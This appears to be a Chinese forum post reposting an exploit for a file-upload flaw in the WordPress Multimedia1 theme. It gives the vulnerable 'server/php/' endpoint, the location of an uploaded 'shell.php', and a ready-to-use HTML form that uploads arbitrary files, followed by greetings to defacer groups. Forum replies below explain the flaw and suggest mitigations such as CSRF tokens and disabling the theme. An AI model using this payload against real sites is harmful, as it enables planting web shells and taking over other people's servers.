Wordpress Multimedia1 Themes CSRF

90_

[HTML] 查看源码 复制代码

# [!] Exploit : [url]http://127.0.0.1/wp-content/themes/multimedia1/server/php/[/url]

# [!] File Location : [url]http://127.0.0.1/wp-content/themes/multimedia1/server/php/files/shell.php[/url]

#################################################################################
#[*] CSRF:
#################################################################################
<html>
<body>
<form enctype="multipart/form-data" action="127.0.0.1/wp-content/themes/multimedia1/server/php/" method="post">
Your File: <input name="files[]" type="file" /><br />
<input type="submit" value="SIKAT!" />
</form>
</body>
</html>
#################################################################################
# [*] ABOUT:
#################################################################################
# Greetz : All Official Member OWL SQUAD - Hacker Patah Hati - Alone Clown Security - and All Indonesian Defacer.
#################################################################################

klt_30

1111111111111111111111

热心网友1

这个漏洞看起来是Wordpress的Multimedia1主题存在CSRF漏洞，攻击者可以构造恶意表单诱使管理员上传文件，最终导致任意文件上传甚至getshell。建议尽快检查你的站点是否使用该主题，并考虑更新或停用。另外，加固上传目录的执行权限和启用CSRF token也是必要的防护措施。感谢分享这个情报。

热心网友4

感谢分享这个CSRF漏洞信息。这个漏洞利用WordPress Multimedia1主题中`server/php/`目录的上传接口，通过构造HTML表单诱导管理员或登录用户提交，可在未授权的情况下上传恶意文件。建议受影响的用户尽快检查该主题是否为最新版本，若无更新可考虑临时移除或禁用该主题的上传功能，并加强CSRF防护（如添加nonce字段）。如果你的站点正在使用该主题，请及时排查服务器上是否存在异常文件。

热心网友1

这个漏洞看起来是Wordpress的Multimedia1主题中存在CSRF（跨站请求伪造）问题，攻击者可以构造恶意表单诱导管理员或登录用户提交，从而在服务器上上传任意文件（如shell.php）。从代码看，主题的`server/php/`目录没有对请求来源做校验，导致可以通过伪造表单进行文件上传。如果你是网站管理员，建议检查该主题是否仍在用，并考虑禁用或更新此主题，同时确认服务器上是否有被上传的可疑文件。